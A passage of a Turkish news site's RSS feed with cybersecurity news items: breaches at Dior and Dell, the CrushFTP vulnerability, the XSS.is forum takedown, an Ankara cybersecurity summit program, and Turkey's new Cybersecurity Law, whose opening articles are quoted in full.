<p data-start="1127" data-end="1271">Şirket, banka veya kredi kartı bilgisi gibi finansal verilerin ele geçirilmediğini ve bu bilgilerin sızan veritabanında yer almadığını açıkladı.</p>
<p data-start="1273" data-end="1513"><strong data-start="1273" data-end="1308">Kimlik koruma hizmeti sunuluyor</strong><br data-start="1308" data-end="1311">Dior, etkilenen kişilere yönelik olarak iki yıl süreyle geçerli olan ücretsiz kredi izleme ve kimlik hırsızlığı koruma hizmeti sunduğunu ve bu hizmete 31 Ekim 2025’e kadar kayıt olunabileceğini duyurdu.</p>
<p data-start="1515" data-end="1875"><strong data-start="1515" data-end="1554">Olay daha önce Asya’da duyurulmuştu</strong><br data-start="1554" data-end="1557">Söz konusu veri ihlalinin tarihi, Dior’un daha önce Güney Kore ve Çin'de yaşanan bir güvenlik olayına dair yaptığı açıklamayla örtüşüyor. Aynı dönemde, LVMH grubuna ait başka bir marka olan Louis Vuitton da Birleşik Krallık, Güney Kore ve Türkiye'deki müşterilerini etkileyen benzer bir saldırıyı kamuoyuna duyurmuştu.</p>
<p data-start="1877" data-end="2162">BleepingComputer tarafından edinilen bilgilere göre, Dior ve Louis Vuitton’a yönelik siber saldırılar aynı zincirin parçası. Saldırının, bir üçüncü taraf satıcının veritabanı üzerinden erişim sağlayan ShinyHunters adlı siber suç grubu tarafından gerçekleştirildiği değerlendiriliyor.</p>
<p data-start="2164" data-end="2337">Henüz Dior’dan ABD’de kaç müşterinin etkilendiğine dair bir açıklama yapılmazken, LVMH çatısı altındaki diğer markaların da benzer bildirimlerde bulunabileceği belirtiliyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>1.000&amp;apos;den Fazla CrushFTP Sunucusu Kritik Açık Nedeniyle Ele Geçirilmeye Açık Durumda</title>
<link>https://www.ajansexpres.com.tr/1000den-fazla-crushftp-sunucusu-kritik-acik-nedeniyle-ele-gecirilmeye-acik-durumda</link>
<guid>https://www.ajansexpres.com.tr/1000den-fazla-crushftp-sunucusu-kritik-acik-nedeniyle-ele-gecirilmeye-acik-durumda</guid>
<description><![CDATA[ CVE-2025-54309 kodlu güvenlik açığı, dünya genelinde 1.000’i aşkın CrushFTP sunucusunu saldırılara karşı savunmasız bırakıyor. Etkili önlemler almayan kullanıcılar, yönetici erişimi dahil olmak üzere ciddi risklerle karşı karşıya. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2db3e7b7.webp" length="38582" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:29:47 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CVE-2025-54309 açığı hangi sistemleri etkiliyor, güncelleme yapmayan CrushFTP sunucuları hangi risklerle karşı karşıya, Shadowserver taramaları ne gösterdi, Clop grubu hangi saldırılarda yer aldı</media:keywords>
<content:encoded><![CDATA[<p data-start="349" data-end="715">CrushFTP yazılımında tespit edilen kritik güvenlik açığı (CVE-2025-54309), internete açık durumda bulunan 1.000’i aşkın sunucunun kötü niyetli kişilerce ele geçirilmesine neden olabilecek saldırıların önünü açtı. Açığın, AS2 doğrulamasının hatalı işlenmesinden kaynaklandığı ve 10.8.5 ile 11.3.4_23 altındaki tüm sürümleri etkilediği bildirildi.</p>
<p data-start="717" data-end="987">CrushFTP tarafından yapılan açıklamada, söz konusu güvenlik zafiyetinin 18 Temmuz 2025 tarihinde aktif olarak istismar edildiği ve saldırganların yazılım kodunu tersine mühendislik yöntemiyle analiz ederek daha önce düzeltilmiş olan bir hatayı hedef aldığı ifade edildi.</p>
<p data-start="989" data-end="1325"><strong data-start="989" data-end="1036">"Güncelleme yapan kullanıcılar etkilenmedi"</strong><br data-start="1036" data-end="1039">Şirket, açık nedeniyle yalnızca güncellemelerini yapmayan sistemlerin hedef alındığını, en güncel sürümü kullanan sunucuların bu açıklardan etkilenmediğini vurguladı. Ayrıca, ana sunucudan izole şekilde yapılandırılan DMZ (Demilitarized Zone) sistemlerinin de güvende olduğu bildirildi.</p>
<p data-start="1327" data-end="1554">Kullanıcılara, yükleme ve indirme günlüklerinin şüpheli etkinlikler açısından incelenmesi, otomatik güncellemelerin aktif hale getirilmesi ve yönetim paneline yalnızca izinli IP adreslerinden erişim sağlanması tavsiye ediliyor.</p>
<p data-start="1556" data-end="1868"><strong data-start="1556" data-end="1602">Shadowserver: 1.040 sunucu hala savunmasız</strong><br data-start="1602" data-end="1605">Siber tehdit izleme platformu Shadowserver’ın gerçekleştirdiği taramalara göre, dünya genelinde yaklaşık 1.040 CrushFTP sunucusu hala söz konusu açıklara karşı yamalanmamış durumda. Shadowserver, bu sunucuların yöneticilerini bilgilendirmeye başladığını açıkladı.</p>
<p data-start="1870" data-end="2096">Saldırıların veri hırsızlığı mı yoksa kötü amaçlı yazılım yükleme amaçlı mı olduğu henüz netleşmemiş olsa da, son yıllarda yönetilen dosya transfer yazılımları fidye yazılım gruplarının öncelikli hedefleri arasında yer alıyor.</p>
<p data-start="2098" data-end="2359"><strong data-start="2098" data-end="2151">Clop grubu benzer sistemleri daha önce hedef aldı</strong><br data-start="2151" data-end="2154">Clop adlı siber suç grubu, daha önce Accelion FTA, GoAnywhere MFT, MOVEit Transfer ve Cleo yazılımında bulunan sıfırıncı gün açıklarını kullanarak geniş çaplı veri hırsızlığı saldırıları gerçekleştirmişti.</p>
<p data-start="2361" data-end="2551">CrushFTP, Nisan 2024'te CVE-2024-4040 kodlu başka bir sıfır gün açığını kapatmış, o dönemde saldırıların ABD’deki bazı kurumları hedef aldığı ve siyasi amaçlı olabileceği değerlendirilmişti.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Dell, World Leaks Grubu Tarafından Hedef Alınan Test Platformundaki İhlali Doğruladı</title>
<link>https://www.ajansexpres.com.tr/dell-world-leaks-grubu-tarafindan-hedef-alinan-test-platformundaki-ihlali-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/dell-world-leaks-grubu-tarafindan-hedef-alinan-test-platformundaki-ihlali-dogruladi</guid>
<description><![CDATA[ Dell, ticari müşterilere ürün tanıtımı yapmak üzere kullanılan Solution Centers platformunun siber saldırıya uğradığını ve sızıntının World Leaks adlı gasp grubunca gerçekleştirildiğini açıkladı. Şirket, sızdırılan verilerin büyük kısmının sahte veya test verisi olduğunu belirtti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2d7950b6.webp" length="33672" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:29:43 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>World Leaks hangi Dell platformunu hedef aldı, sızdırılan veriler ne tür bilgileri içeriyor, saldırıda gerçek müşteri verileri ele geçirildi mi, World Leaks grubu daha önce hangi saldırılarda yer aldı</media:keywords>
<content:encoded><![CDATA[<p data-start="400" data-end="703">Teknoloji şirketi Dell, World Leaks adlı gasp grubunun, firmanın "Customer Solution Centers" adlı ürün tanıtım platformuna yetkisiz erişim sağladığını doğruladı. 2025 Temmuz ayı başında gerçekleşen saldırı sonrası, tehdit aktörü sızdırdığı verilerin bir kısmını kamuoyuyla paylaştı.</p>
<p data-start="705" data-end="977">Dell tarafından BleepingComputer’a yapılan açıklamada, saldırıya uğrayan ortamın şirketin müşterilerine ürün ve çözüm tanıtımı yaptığı, ticari amaçlı yapılandırılmış bir gösterim ortamı olduğu ve gerçek müşteri sistemleri ile doğrudan bağlantısının bulunmadığı vurgulandı.</p>
<p data-start="979" data-end="1220">Şirket, sızdırılan verilerin büyük bölümünün sahte veri setleri, genel erişime açık test verileri ve sistem çıktılarından oluştuğunu ifade etti. Buna ek olarak, gerçek olduğu doğrulanan tek verinin eski bir iletişim listesi olduğu açıklandı.</p>
<p data-start="1222" data-end="1609"><strong data-start="1222" data-end="1268">Veriler sızdırıldı, şifreler tespit edildi</strong><br data-start="1268" data-end="1271">World Leaks, saldırıya ilişkin yaklaşık 1,3 terabaytlık veriyi elde ettiğini öne sürerek bir kısmını sızdırdı. Yayınlanan verilerde ağırlıklı olarak yapılandırma betikleri, sistem yedekleri ve çeşitli BT uygulamalarına ait veriler bulunuyor. Bazı dosyalarda, ekipman kurulumunda kullanılan iç sistem şifrelerinin de yer aldığı belirlendi.</p>
<p data-start="1611" data-end="1740">Dell, saldırının nasıl gerçekleştiğine ve fidye taleplerine dair ayrıntı vermediğini, olayın hala incelenmekte olduğunu bildirdi.</p>
<p data-start="1742" data-end="2097"><strong data-start="1742" data-end="1793">Hunters International’dan World Leaks’e dönüşüm</strong><br data-start="1793" data-end="1796">World Leaks grubu, 2023 sonunda başlatılan ve daha önce Hive fidye yazılımıyla bağlantılı olduğu değerlendirilen Hunters International adlı grubun yeniden markalanmış hali olarak biliniyor. Grup, 2025 başında ransomware yerine sadece veri gaspı yöntemine odaklanacağını duyurarak ismini değiştirmişti.</p>
<p data-start="2099" data-end="2475">Bu tarihten itibaren World Leaks, 49 farklı kuruluşun verilerini kamuya açık internet sitelerinde yayımladı. Grup, son dönemde SonicWall SMA 100 cihazlarındaki güvenlik açıklarını da kullanarak bazı kurumlara özel rootkit araçlarıyla erişim sağladı. Macnica'dan tehdit araştırmacısı Yutaka Sejiyama, yayımlanan 46 kuruluştan 10’unun söz konusu cihazları kullandığını belirtti.</p>
<p data-start="2477" data-end="2594">World Leaks şu an itibarıyla Dell'i resmi sızıntı listesine eklemiş değil. Ancak veriler kamuoyuna açılmaya başlandı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>XSS.is Forumunun Kapatılmasıyla Uluslararası Siber Suç Ağına Büyük Darbe</title>
<link>https://www.ajansexpres.com.tr/xssis-forumunun-kapatilmasiyla-uluslararasi-siber-suc-agina-buyuk-darbe</link>
<guid>https://www.ajansexpres.com.tr/xssis-forumunun-kapatilmasiyla-uluslararasi-siber-suc-agina-buyuk-darbe</guid>
<description><![CDATA[ Ukrayna&#039;nın başkenti Kiev&#039;de gerçekleştirilen uluslararası operasyonla XSS.is forumunun yöneticisi gözaltına alındı. Siber suç faaliyetlerinin merkezlerinden biri olan platform, 50 binden fazla kullanıcıya hizmet veriyordu ve milyonlarca euroluk yasa dışı işlemde rol oynuyordu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2d3839c6.webp" length="65104" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:29:39 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>xss forumu neden kapatıldı, operasyon hangi ülkelerin iş birliğiyle yapıldı, forum yöneticisi ne kadar gelir elde etti, kapatma siber suç dünyasını nasıl etkileyecek</media:keywords>
<content:encoded><![CDATA[<h1>XSS.is Forumu Kapatıldı: Uluslararası Operasyonla Yakalandı</h1>
<p>Uluslararası iş birliğiyle yürütülen bir operasyon kapsamında, dünyanın en büyük Rusça konuşulan siber suç forumlarından biri olan <strong>XSS.is</strong> kapatıldı. Forumun yöneticisi, <strong>22 Temmuz 2025</strong> tarihinde Ukrayna'nın başkenti <strong>Kiev</strong>'de yakalandı. Operasyon, Fransız polisi, Ukrayna makamları ve Europol'ün ortak çalışmasıyla gerçekleştirildi.</p>
<h2>4 Yıllık Soruşturma Süreci</h2>
<p>Paris Emniyet Müdürlüğü Siber Suç Birimi tarafından <strong>2 Temmuz 2021</strong> tarihinde başlatılan kapsamlı soruşturma sonucunda forumun faaliyetlerine dair çok sayıda veri toplandı. Fransız kolluk kuvvetleri, XSS forumuyla bağlantılı olan <em>thesecure.biz</em> adlı Jabber sunucusu üzerinden iletişimleri takip etti. Bu takip sonucunda yakalanan kişinin, çok sayıda yasa dışı siber suç ve fidye yazılımı operasyonuyla bağlantılı olduğu belirlendi.</p>
<h2>Forumun Geçmişi ve Rolü</h2>
<p><strong>2013</strong> yılında <em>DaMaGeLab</em> adıyla kurulan ve <strong>2018</strong>'de <strong>XSS.is</strong> ismini alan platform, siber suç dünyasında köklü bir geçmişe sahipti. 50 binden fazla kayıtlı kullanıcısıyla XSS.is, kötü amaçlı yazılım satışı, sistemlere izinsiz erişim, çalıntı veri ticareti ve fidye yazılım hizmetleri gibi faaliyetlerin merkezi konumundaydı. Ayrıca forum, şifreli Jabber sunucusu üzerinden siber suçlular arasında anonim iletişim imkânı da sunuyordu.</p>
<h2>Mali Boyut ve Yasal Süreç</h2>
<p>Europol tarafından yapılan açıklamaya göre, gözaltına alınan şüphelinin forum üzerinden <strong>7 milyon euro</strong>dan fazla gelir elde ettiği belirlendi. Şüphelinin sadece teknik altyapıyı yönetmediği, aynı zamanda suçlular arası anlaşmazlıkları çözdüğü ve işlemlerin güvenliğini sağladığı kaydedildi.</p>
<p>Şüpheli hakkında <strong>9 Kasım 2021</strong> tarihinde “veri işleme sistemlerine yönelik saldırılara yardım ve yataklık”, “örgütlü gasp” ve “suç örgütü üyeliği” suçlamalarıyla yasal işlem başlatıldı. Bu operasyon, karanlık ağ üzerindeki benzer platformlara yönelik süren uluslararası baskının bir parçası olarak değerlendiriliyor.</p>
<h2>Kapanmanın Etkisi</h2>
<p>Uzmanlara göre, geniş kullanıcı kitlesine sahip XSS.is gibi yerleşik platformların kapatılması, siber suç ekosisteminde ciddi boşluklara neden olabilir. Bu gelişme, karanlık ağda faaliyet gösteren suç ağlarına yönelik uluslararası iş birliğinin önemini bir kez daha ortaya koydu.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Dijital Tehditler, Yapay Zekâ ve Yerlileşme Gündemiyle 8. Siber Güvenlik Zirvesi Ankara&amp;apos;da Gerçekleştirilecek</title>
<link>https://www.ajansexpres.com.tr/dijital-tehditler-yapay-zeka-ve-yerlilesme-gundemiyle-8-siber-guvenlik-zirvesi-ankarada-gerceklestirilecek</link>
<guid>https://www.ajansexpres.com.tr/dijital-tehditler-yapay-zeka-ve-yerlilesme-gundemiyle-8-siber-guvenlik-zirvesi-ankarada-gerceklestirilecek</guid>
<description><![CDATA[ Türkiye Bilişim Derneği&#039;nin ev sahipliğinde 12 Haziran 2025’te BTK Ana Konferans Salonu&#039;nda düzenlenecek 8. Siber Güvenlik Ekosisteminin Geliştirilmesi Zirvesi, yapay zekâ, kritik altyapılar, yerli teknolojiler ve siber güvenlik girişimciliği gibi konuların ele alınacağı yoğun bir programla sektörün önde gelen isimlerini bir araya getirecek. ]]></description>
<enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_683433e82cbe1.webp" length="49398" type="image/jpeg"/>
<pubDate>Mon, 26 May 2025 13:22:18 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>Yapay Zekâ ve Yerlileşme Gündemiyle 8. Siber Güvenlik Zirvesi, 8. Siber Güvenlik Zirvesi</media:keywords>
<content:encoded><![CDATA[<p data-start="491" data-end="910"><strong data-start="512" data-end="572">Siber güvenlik ekosisteminin gelişimi masaya yatırılacak</strong><br data-start="572" data-end="575">Türkiye Bilişim Derneği tarafından organize edilen 8. Siber Güvenlik Ekosisteminin Geliştirilmesi Zirvesi, 12 Haziran 2025 tarihinde Ankara’daki BTK Ana Konferans Salonu'nda gerçekleştirilecek. Etkinlik, kamu, özel sektör ve akademiden uzman isimlerin katılımıyla siber güvenliğin geleceğine dair kritik başlıkları tartışmaya açacak.</p>
<p data-start="912" data-end="1209"><strong data-start="912" data-end="961">Protokol ve sponsor konuşmalarıyla başlayacak</strong><br data-start="961" data-end="964">Zirve, saat 09.00’da kayıt süreciyle başlayacak. 09.45-11.00 saatleri arasında yapılacak protokol konuşmalarında Türkiye Bilişim Derneği Genel Başkanı Kenan Altınsaat ve T.C. Sanayi ve Teknoloji Bakan Yardımcısı Zekeriya Coştu konuşma yapacak.</p>
<p data-start="1211" data-end="1289">11.00-11.15 arasında platin sponsor SAYTEC adına CTO Yakup Saygın konuşacak.</p>
<p data-start="1291" data-end="1780"><strong data-start="1291" data-end="1346">Kritik altyapılar ve yapay zekâ tehditleri gündemde</strong><br data-start="1346" data-end="1349">Saat 11.15’te başlayacak ilk oturumda, 'Kritik Altyapılarda Sessiz Savaş: Dijital Saldırılar, Fiziksel Etkiler, Yapay Zekânın Getirdiği Tehditler' başlığı altında çeşitli alanlardan uzmanlar görüşlerini paylaşacak. Panelin moderatörlüğünü SAU Kritik Altyapılar Ulusal Test Yatağı Merkezi Koordinatörü Prof. Dr. İbrahim Özçelik üstlenecek. Panelde; Ahmet Pekel, Can Demirel, Cem Dursun ve Mahmut Küçük konuşmacı olarak yer alacak.</p>
<p data-start="1782" data-end="2055"><strong data-start="1782" data-end="1820">Yerlileşme ve girişimcilik vurgusu</strong><br data-start="1820" data-end="1823">Öğle yemeğinin ardından saat 13.30’da Türkiye Bilişim Derneği tarafından verilen Siber Güvenlik Ekosistemine Katkı Ödülleri sahiplerini bulacak. 14.00’te Altın Sponsor İNDAS Cybersecurity Kurucu Ortağı Yavuz Aydın konuşma yapacak.</p>
<p data-start="2057" data-end="2233">Aynı saatlerde TED Üniversitesi’nden Prof. Dr. Murat Karakaya, ‘Büyük Dil Modellerinin İmkân ve Kabiliyetleri ile Getirdiği Riskler’ konulu eğitim oturumunu gerçekleştirecek.</p>
<p data-start="2235" data-end="2611">14.15’te başlayacak ikinci panelde ise ‘Siber Savunmada Yerlileşme: Sorunlar ve Fırsatlar; Girişimci, Yatırımcı ve Kamu Perspektifi’ başlığı altında sektörel değerlendirmeler yapılacak. Panelin moderatörlüğünü SSB Türkiye Siber Güvenlik Kümelenmesi Genel Koordinatörü Alpaslan Kesici üstlenecek. Konuşmacılar arasında Hakan Terzioğlu, İsmail Güneş ve Savaş Ergen yer alacak.</p>
<p data-start="2613" data-end="2826"><strong data-start="2613" data-end="2658">Eğitimler ve TEDx konuşmaları ile kapanış</strong><br data-start="2658" data-end="2661">Saat 15.00’te Ankara Üniversitesi’nden Öğr. Gör. Muhammed Saadettin Kaya, 'Mahremiyet Koruyucu Tekniklerin Yapay Zekâ Eğitiminde Kullanımı' konulu eğitimi sunacak.</p>
<p data-start="2828" data-end="2983">15.45-16.45 saatleri arasında TEDx konuşmaları gerçekleştirilecek. Zirve, 16.45-17.15 saatleri arasında yapılacak kapanış ve ödül töreni ile sona erecek.</p>
<p><a href="https://www.siberguvenlikzirvesi.org.tr/2025/kayit">Kayıt Adresi</a></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Türkiye&amp;apos;nin İlk Siber Güvenlik Kanunu Yürürlüğe Girdi</title>
<link>https://www.ajansexpres.com.tr/turkiyenin-ilk-siber-guvenlik-kanunu-yururluge-girdi</link>
<guid>https://www.ajansexpres.com.tr/turkiyenin-ilk-siber-guvenlik-kanunu-yururluge-girdi</guid>
<description><![CDATA[ Resmî Gazete’de yayımlanan 7545 sayılı Siber Güvenlik Kanunu ile Türkiye’nin siber savunma altyapısı güçlendiriliyor. Yeni düzenleme, kamu kurumları ve kritik altyapıları siber tehditlere karşı koruma altına alırken, sertifikasyon ve denetim süreçlerini de kapsıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202503/image_870x580_67da37e03f19c.webp" length="50886" type="image/jpeg"/>
<pubDate>Wed, 19 Mar 2025 06:20:22 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>Türkiye’nin siber güvenlik kanunu neleri kapsıyor, siber saldırılara yönelik cezalar neler, kritik altyapılar nasıl korunacak, siber güvenlik sertifikasyonu nasıl uygulanacak</media:keywords>
<content:encoded><![CDATA[<p data-start="380" data-end="721">Türkiye, dijital dünyadaki güvenliğini artırmak amacıyla önemli bir adım attı. 7545 sayılı <strong data-start="471" data-end="496">Siber Güvenlik Kanunu</strong>, 19 Mart 2025 tarihli Resmî Gazete’de yayımlanarak yürürlüğe girdi. Kanun, siber tehditlere karşı ulusal düzeyde önlemler alınmasını sağlarken, kamu kurumları ve kritik altyapılar için yeni güvenlik standartları getiriyor.</p>
<p data-start="723" data-end="774"><strong data-start="723" data-end="772">Siber Güvenliği Güçlendiren Yeni Düzenlemeler</strong></p>
<p data-start="776" data-end="1080">Kanunun amacı, Türkiye’nin siber uzaydaki milli güvenliğini sağlamak, kamu ve özel sektörü siber tehditlerden korumak ve ulusal çapta bir siber güvenlik stratejisi oluşturmak olarak belirlendi. Düzenleme kapsamında <strong data-start="991" data-end="1016">Siber Güvenlik Kurulu</strong> kurulacak ve <strong data-start="1030" data-end="1059">Siber Güvenlik Başkanlığı</strong> yetkilendirilecek.</p>
<p data-start="1082" data-end="1274">Kanunun kapsamına, kamu kurumları, kritik altyapılar, meslek kuruluşları, özel şirketler ve bireyler dahil edildi. Ancak, <strong data-start="1204" data-end="1239">askeri ve istihbari faaliyetler</strong> bu düzenlemenin dışında tutuldu.</p>
<p data-start="1276" data-end="1325"><strong data-start="1276" data-end="1323">Siber Güvenlik Başkanlığı’na Geniş Yetkiler</strong></p>
<p data-start="1327" data-end="1378">Yeni düzenlemeye göre, Siber Güvenlik Başkanlığı;</p>
<ul data-start="1379" data-end="1724">
<li data-start="1379" data-end="1450">Kritik altyapıların siber saldırılara karşı korunmasını sağlayacak,</li>
<li data-start="1451" data-end="1547">Kamu kurumları ile kritik altyapılara yönelik siber güvenlik denetimlerini gerçekleştirecek,</li>
<li data-start="1548" data-end="1642">Siber tehdit istihbaratı toplayarak siber saldırıları önlemeye yönelik çalışmalar yapacak,</li>
<li data-start="1643" data-end="1724">Siber güvenlik alanında sertifikasyon ve yetkilendirme süreçlerini yönetecek.</li>
</ul>
<p data-start="1726" data-end="1762"><strong data-start="1726" data-end="1760">Siber Suçlar İçin Ağır Cezalar</strong></p>
<p data-start="1764" data-end="2076">Kanunda siber güvenlikle ilgili ağır cezalar da öngörülüyor. Kritik altyapılara yönelik siber saldırı düzenleyenlere <strong data-start="1881" data-end="1910">8 ila 12 yıl hapis cezası</strong>, sızdırılan verileri yayanlara <strong data-start="1942" data-end="1972">10 ila 15 yıl hapis cezası</strong> verilecek. Ayrıca, sahte veri sızıntısı haberleri yayanlara <strong data-start="2033" data-end="2061">2 ila 5 yıl hapis cezası</strong> uygulanacak.</p>
<p data-start="2078" data-end="2124"><strong data-start="2078" data-end="2122">Denetim ve Sertifikasyon Süreci Başlıyor</strong></p>
<p data-start="2126" data-end="2376">Kanuna göre, siber güvenlik alanında faaliyet gösteren şirketler ve yazılım sağlayıcıları, <strong data-start="2217" data-end="2251">yetkilendirme ve sertifikasyon</strong> sürecine tabi tutulacak. <strong data-start="2277" data-end="2374">Kamu kurumlarında kullanılacak yazılım ve donanımların yerli ve milli olması teşvik edilecek.</strong></p>
<p data-start="2378" data-end="2534">Uzmanlara göre, yeni yasa Türkiye’nin siber güvenlik altyapısını güçlendirecek ve ulusal düzeyde siber tehditlere karşı daha etkili bir koruma sağlayacak.</p>
<p data-start="2378" data-end="2534">İşte yayınlanan <strong>SİBER GÜVENLİK KANUNU </strong>tamamı</p>
<p class="Metin"><b><span>Amaç<o:p></o:p></span></b></p>
<p class="Metin"><span class="GramE"><b><span>MADDE 1-</span></b><span> (1) Bu Kanunun amacı, Türkiye Cumhuriyeti’nin siber uzaydaki milli gücünü meydana getiren bütün unsurlarına karşı içten ve dıştan yöneltilen mevcut ve muhtemel tehditlerin tespit ve bertaraf edilmesi, siber olayların muhtemel etkilerini azaltmaya yönelik esasların belirlenmesi, kamu kurum ve kuruluşları, kamu kurumu niteliğinde meslek kuruluşları, gerçek ve tüzel kişiler ile tüzel kişiliği bulunmayan kuruluşların siber saldırılara karşı korunmasına yönelik gerekli düzenlemelerin yapılması, ülkenin siber güvenliğini güçlendirmek için strateji ve politikaların belirlenmesi ile Siber Güvenlik Kurulunun kurulmasına ilişkin esasları düzenlemektir.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><b><span>Kapsam<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 2- </span></b><span>(1) Bu Kanun, siber uzayda varlık gösteren, faaliyet yürüten, hizmet sunan kamu kurum ve kuruluşları, kamu kurumu niteliğinde meslek kuruluşları, gerçek ve tüzel kişiler ile tüzel kişiliği bulunmayan kuruluşları kapsar.<o:p></o:p></span></p>
<p class="Metin"><span>(2) <span class="GramE">4/7/1934</span> tarihli ve 2559 sayılı Polis Vazife ve Salâhiyet Kanunu, 9/7/1982 tarihli ve 2692 sayılı Sahil Güvenlik Komutanlığı Kanunu ve 10/3/1983 tarihli ve 2803 sayılı Jandarma Teşkilat, Görev ve Yetkileri Kanunu uyarınca yürütülen <span class="SpellE">istihbari</span> faaliyetler ile 1/11/1983 tarihli ve 2937 sayılı Devlet İstihbarat Hizmetleri ve Milli İstihbarat Teşkilatı Kanunu ile 4/1/1961 tarihli ve 211 sayılı Türk Silahlı Kuvvetleri İç Hizmet Kanunu uyarınca yürütülen faaliyetler bu Kanun kapsamı dışındadır.<o:p></o:p></span></p>
<p class="Metin"><b><span>Tanım ve kısaltmalar<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 3- </span></b><span>(1) Bu Kanunda geçen;<o:p></o:p></span></p>
<p class="Metin"><span>a) Barındırma: Bilişim sistemlerinin harici bir veri merkezinde bulundurulmasını,<o:p></o:p></span></p>
<p class="Metin"><span>b) Başkan: Siber Güvenlik Başkanını,<o:p></o:p></span></p>
<p class="Metin"><span>c) Başkanlık: Siber Güvenlik Başkanlığını,<o:p></o:p></span></p>
<p class="Metin"><span>ç) Bilişim sistemleri: Bilgi ve iletişim teknolojileri vasıtasıyla sağlanan her türlü hizmetin, işlemin ve verinin sunumunda kullanılan donanım, yazılım, sistem ve aktif veya pasif durumda bulunan tüm diğer bileşenleri,<o:p></o:p></span></p>
<p class="Metin"><span>d) Kritik altyapı: İşlediği bilginin/verinin gizliliği, bütünlüğü veya erişilebilirliği bozulduğunda can kaybına, büyük ölçekli ekonomik zarara ve güvenlik açıklarına veya kamu düzeninin bozulmasına yol açabilecek bilişim sistemlerini barındıran altyapıları,<o:p></o:p></span></p>
<p class="Metin"><span class="GramE"><span>e) Kritik kamu hizmeti: Ulusal, toplumsal veya ekonomik faaliyetlerin sürdürülmesi için gerekli olan ve kesintiye uğraması veya zarar görmesi halinde ulusal güvenlik, ülkenin sosyal veya ekonomik refahı, kamu düzeni veya sağlığı ya da diğer hizmetlerin sunumu üzerinde önemli bir etki oluşturabilecek ülke genelinde tekel veya sınırlı ikame ile sunulan hizmeti,</span></span><span><o:p></o:p></span></p>
<p class="Metin"><span>f) Siber güvenlik: Siber uzayı oluşturan bilişim sistemlerinin saldırılardan korunmasını, bu ortamda işlenen verinin gizlilik, bütünlük ve erişilebilirliğinin güvence altına alınmasını, saldırıların ve siber olayların tespit edilmesini, bu tespitlere karşı tepki ve alarm mekanizmalarının devreye alınmasını ve sonrasında yaşanan siber olay öncesi duruma geri döndürülmesini kapsayan faaliyetler bütününü,<o:p></o:p></span></p>
<p class="Metin"><span>g) Siber olay: Bilişim sistemlerinin veya verinin gizlilik, bütünlük veya erişilebilirliğinin ihlal edilmesini,<o:p></o:p></span></p>
<p class="Metin"><span>ğ) Siber saldırı: Siber uzaydaki bilişim sistemlerinin ve bu sistemler tarafından işlenen verinin gizliliği, bütünlüğü veya erişilebilirliğini ortadan kaldırmak amacıyla, siber uzayın herhangi bir yerindeki kişi veya bilişim sistemlerine yönelik olarak kasıtlı yapılan işlemleri,<o:p></o:p></span></p>
<p class="Metin"><span>h) Siber tehdit: Bilişim sistemlerinin, bu sistemlerde bulunan veya bu sistemler tarafından işlenen verinin gizlilik, bütünlük veya erişilebilirliğinin ihlal edilmesine neden olabilecek potansiyel tehlikeleri,<o:p></o:p></span></p>
<p class="Metin"><span>ı) Siber tehdit istihbaratı: Siber uzaydaki varlıklara yönelik mevcut veya potansiyel siber tehdit unsurları ile siber saldırılar hakkında bir araya getirilmiş, dönüştürülmüş, analiz edilmiş, yorumlanmış veya zenginleştirilmiş bilgiyi,<o:p></o:p></span></p>
<p class="Metin"><span>i) Siber uzay: Doğrudan ya da dolaylı olarak internete, elektronik haberleşme veya bilgisayar ağlarına bağlı olan tüm bilişim sistemlerini ve bunları birbirine bağlayan ağlardan oluşan ortamı,<o:p></o:p></span></p>
<p class="Metin"><span>j) SOME: Siber olaylara müdahale ekibini,<o:p></o:p></span></p>
<p class="Metin"><span>k) Varlık: Elektronik veya fiziksel ortamlarda yer alan ve iletişim yoluyla aktarılabilen veriyi içeren tüm bilgi ve bilgi işleme olanaklarını, veriyi kullanan veya taşıyan personeli ve veriyi barındıran fiziksel mekânları,<o:p></o:p></span></p>
<p class="Metin"><span>l) Zafiyet: Siber uzayda yer alan varlıkların herhangi bir siber tehdit tarafından istismar edilebilecek zayıflık ve güvenlik açıklarını,<o:p></o:p></span></p>
<p class="Metin"><span class="GramE"><span>ifade</span></span><span> eder.<o:p></o:p></span></p>
<p class="Metin"><b><span>Temel ilkeler<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 4- </span></b><span>(1) Siber güvenliğin sağlanmasında temel ilkeler şunlardır:<o:p></o:p></span></p>
<p class="Metin"><span>a) Siber güvenlik milli güvenliğin ayrılmaz bir parçasıdır.<o:p></o:p></span></p>
<p class="Metin"><span>b) Kritik altyapı ve bilişim sistemlerinin korunması ile güvenli bir siber uzay oluşturulması temel hedeftir.<o:p></o:p></span></p>
<p class="Metin"><span>c) Siber güvenlikle ilgili çalışmalar kurumsallık, süreklilik ve sürdürülebilirlik temelli yürütülür.<o:p></o:p></span></p>
